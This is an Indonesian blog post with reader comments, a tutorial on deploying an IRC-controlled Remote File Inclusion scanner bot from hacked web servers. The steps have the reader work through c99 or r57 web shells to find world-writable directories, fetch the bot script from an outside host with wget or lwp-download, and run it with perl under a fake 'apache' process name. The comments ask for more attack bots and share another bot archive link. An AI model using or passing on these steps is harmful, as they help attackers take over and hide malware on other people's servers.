LeNK PeRSoNaL BLoG

… bukan sekedar blog …

Cara Membuat Bot Scan RFI di mIRC

Posted by LeNK pada 26 Agustus, 2007

Saya mau menjelaskan sedikit cara mencari target/shell melalui bot scanner RFI di irc. Anda bisa dapatkan scriptnya di page script collection blog saya ini. saya anggap anda sudah mengerti sedikit mengenai command linux dan injection web. disini saya menggunakan shell c99 dan r57 sebagai panduannya.

ok.. kita mulai.

  1. Copy paste dan simpan script yang saya beri di geocities ato web anda kedalam format txt, ato anda juga bisa langsung menggunakan milik saya
  2. Masuk ke shell anda
  3. cari direktori yang memberikan permission 777 dengan command “find / -perm 777 -type d”
  4. jika ga ada, langsung aja menuju direktori /tmp ato /var/tmp
  5. wget script bot dari web geocities saya ato dari tempat anda. saya pake contoh punya rekan saya, jadi commandnya “wget pluto5yc04.alkadr.com/IOS/Users/pluto5yc04.alkadr.com/Files/ngedan.txt”
  6. jika ga berhasil, coba pake command lwp-download tapi dengan url yang lengkap, commandnya “lwp-download http://pluto5yc04.alkadr.com/IOS/Users/pluto5yc04.alkadr.com/Files/ngedan.txt”
  7. kalo ga bisa juga, pakailah fitur uploadnya karena saya menggunakan r57 ato c99. dan uploadlah script botnya dengan fitur tersebut. jika belum punya filenya, donlot aja dari http://pluto5yc04.alkadr.com/IOS/Users/pluto5yc04.alkadr.com/Files/ngedan.txt
  8. Saya anggap script tersebut udah di upload, maka jalankan commandnya “perl namafile server nick ident channel owner fakeproccess” contohnya ” perl scan.txt irc.dal.net bugzz bug balihackerlink LeNK /usr/sbin/apache”
  9. Jika berhasil, di shell anda akan keluar tulisan.. dan di channel yang anda join, bot akan pm anda dan beri salam “you are my master”
  10. Untuk mengetahui command yang dipake, pm bot dan ketik !cmdx @help
  11. Silahkan dipergunakan sebaik mungkin

Ket :

  1. Ini adalah tutor untuk pembuatan bot scan RFI pada web hasil inject
  2. Tutor ini hanya berjalan pada mesin Linux ato keluarga UNIX
  3. Semua command di atas tanpa tanda petik dua (”)

Semoga membantu…
Credit to : dr.pluto

Editing sedikit :

banyak rekan yang menanyakan kenapa bot tidak jalan? banyak faktor yang menyebabkan hal tersebut

  • Shell lambat
  • Script yang tidak mau jalan di shell

sebenarnya, jika bot sudah masuk ke channel dan bot telah pm/pv anda dengan kata “You are my master” itu tandanya bot telah jalan. Jadi coba dengan command !cmdx @help saat pv/pm bot untuk melihat list helpnya. Script ini masih berfungsi setelah saya coba..

Dan untuk selanjutnya, mungkin akan saya buat artikel mengenai bot scan yang lainnya. jadi harap ditunggu.. :D

About these ads

26 Tanggapan to “Cara Membuat Bot Scan RFI di mIRC”

  1. rusty said

    Wah…
    bener bisa ga yah?? ini seh yang gue cari.. gue test dulu ya

  2. Orang said

    gak bisa ada errornya coba deh di cek lagi scriptnya baris 220

    Reply from LeNK :
    terimakasih udah di beritahukan. script sudah diganti dan silahkan di donlot kembali.

  3. Orang said

    setelah dijalankan tidak bekerja, saya coba jalankan perintah ke botnya !cmdx @help tapi diem aja

  4. Orang said

    ada script scanner google gak?

    Reply from LeNK:
    ada… nanti saya buatan article yang baru.. harap ditunggu
    :D

  5. Fluzy said

    saya ingin tanya nih botscannya saat saya masukan ke channel kok gak bisa di @help dan !cmdx kira² kesalahannya di mana nih, dan satu lagi jika mau matikan bot gimana cara atau perintahnya thank’s

    Reply from LeNK:
    pake command !cmdx @help di channel bro… kalo mau matiin !cdmx @die.. itu udah ada kok di list helpnya
    :D

  6. saya mau belajar tentang ini, tp saya masih belum paham, bagaimana menggabungkan command linux di windows atau memang kita chatnya lewat linux? setau saya mereka yang menggunakan shell tetap memakai windows untuk chat di mirc. Untuk shell ini harus mempunyai domain dan hosting sendiri yha? Tolong penjelasan detailnya :D
    Blog nya bagus tuk pembelajaran, terima kasih

    Reply from LeNK :
    Begini bro.. yang saya maksud disini adalah shell c99 atau r57. Nah shell itu menggunakan bahasa php. jadi kita melakukan injeksi ke lubang sebuah web dengan menggunakan bahasa php itu. jika berhasil, maka bahasa php itulah yang berfungsi untuk membuat suatu tampilan di monitor kita. namun dalam melakukan aksi, tetap menggunakan bahasa UNIX.
    :D

  7. Fluzy said

    ada source bot RFI baru gak klo ada minta dong

  8. odod said

    script bot scannya gk ada lg ya?
    ada yg baru gk? yg lbh tokcer gtu… :D

    Good Luck… :)

    Reply from LeNK :
    tunggu ya bro.. ada kok..
    ;)

  9. i_am said

    buz,,,!!

  10. X-Friends said

    OM tutornya aq posting di webku ya??? ga papa kan??
    dah aq isi ” taken from” nya kok. :)
    thanks atas Ilmu nya!!!

  11. pingin_tau said

    saya mau tanya ni um…….
    compi saya mengunakan program windows ………
    bukan mengunakan linux….
    nach yang saya ingin tanya kan bisa kah saya bisa buat bot scan dengan mengunakan programe………..?
    tolong bimbingannya……..
    thank you

  12. sh1nch1 said

    Aloww Om.. Info terbaru ada gk tentang bot tuh.

    thx sebelumnya

    -Sh1nch1-

  13. Didik said

    mumet aku!!!!
    apa itu “wget”?
    apa itu “shell”.
    Buka shell kamu! Shell yg mana????
    komet bro… bantu buat mulai komputer hidup dong…
    pertama buka windows,trus buka apa? trus buka apa?
    Dari awal dong bang biar tau.saya orang gabTex nich…
    Thx ya..

  14. gak dikenal said

    format txt yang mana
    beb oe kagak teu
    huehuee
    tolong kasi penjelasan yg detail
    thx sblumnya.. buat abg ne!!
    hehe

  15. sry bang nm emailnya salah
    neh sya kasi yg bnr
    trz sm web ny jg

  16. Dhika said

    format txt yang mana
    beb oe kagak teu
    huehuee
    tolong kasi penjelasan yg detail
    thx sblumnya.. buat abg ne!!
    hehe

  17. re4n said

    http://pluto5yc04.alkadr.com/IOS/Users/pluto5yc04.alkadr.com/Files/ngedan.txt

    kog bisa ya bro….???

    Reply from LeNK :
    sepertinya link udah mati. tunggu bro, akan saya usahakan untuk diupdate lagi.
    karena script terakhir yang saya miliki, sudah tidak jalan lagi di IRC

  18. jiwa gila said

    wah elo tu mah dah lama…..
    ada yang lebih canggih lagi tuh

    http://www.geocities.com/kelelawar_kecil/kopler.tar.gz


    Reply from LeNK :
    waw.. setelah saya liat, file tclnya di jadikan satu ya?
    jadi sebuah bot bisa multifungsi? mantap..
    tapi masih bisa ga neh?

  19. RaNDi said

    Gimana cara nya supaya bisa ngeposting script tuh ke geocities???
    maklum masih cupu…
    udah banyak script yang saya punya tapi saya ngak bisa ngeposting nyah!!!

  20. tuma said

    RFI itu apa sih mas? Jadi untuk menggunakan script ini kita harus install LAMP ya? Apakah jg harus punya akun shell? Bisa ga dijalanin di xchat soalnya saya pake ubuntu? Makasih sblmnya

    Reply from LeNK :
    RFI itu kependekan dari Remote File Inclusion. Mungkin kasarnya seh sebagai sebuah teknik mengambil alih komputer korban yang mempunyai sebuah lubang alias bug atau vulneralbility pada webnya. Jadi komputer yang dimaksud biasanya sebuah server.

    kalo setahu saya seh ga perlu pake LAMP. Xchat saya belum pernah pake neh… tapi kayaknya bisa seh :D

  21. Cavuera said

    waduh wa pening lihat tcl nya… trus wa mo instal tuh bot di mIRC tapi gimana tentukan alamat server yang dituju???
    trus untuk yang bagian gua bingung nick owner itu apa???
    makasih

    Reply from LeNK :
    tergantung tcl botnya mas.. kalo pake punyanya pluto, musti ikuti petunjukknya.
    tapi kalo pake bot scan lainnya, biasanya musti rubah tcl. simple kok.. tinggal ganti server. nick owner ya nick mas sendiri. masak mau buat bot untuk orang lain :p

  22. vicko said

    kog scriptnya ga ada lagi?

  23. mikail said

    bisa kasih ionfo gak bos cara bikin/TCL bot yg bisa proses secara otomatis,,hasil injekan yg langsung digabung ama path,,thanks

  24. goang said

    bozzzz knapa d sshq kok setiap masukkan perintah itu semua keluar Permission denied. gimana tu solusinya bozzzzz

  25. udhebolong said

    Tutorial CACAD….!!!!

  26. udhebolong said

    penjelasannya tidak jelas, apa itu ??

Berikan Balasan

Isikan data di bawah atau klik salah satu ikon untuk log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Logout / Ubah )

Twitter picture

You are commenting using your Twitter account. Logout / Ubah )

Facebook photo

You are commenting using your Facebook account. Logout / Ubah )

Google+ photo

You are commenting using your Google+ account. Logout / Ubah )

Connecting to %s

 
Ikuti

Get every new post delivered to your Inbox.

Bergabunglah dengan 28 pengikut lainnya.

%d blogger menyukai ini: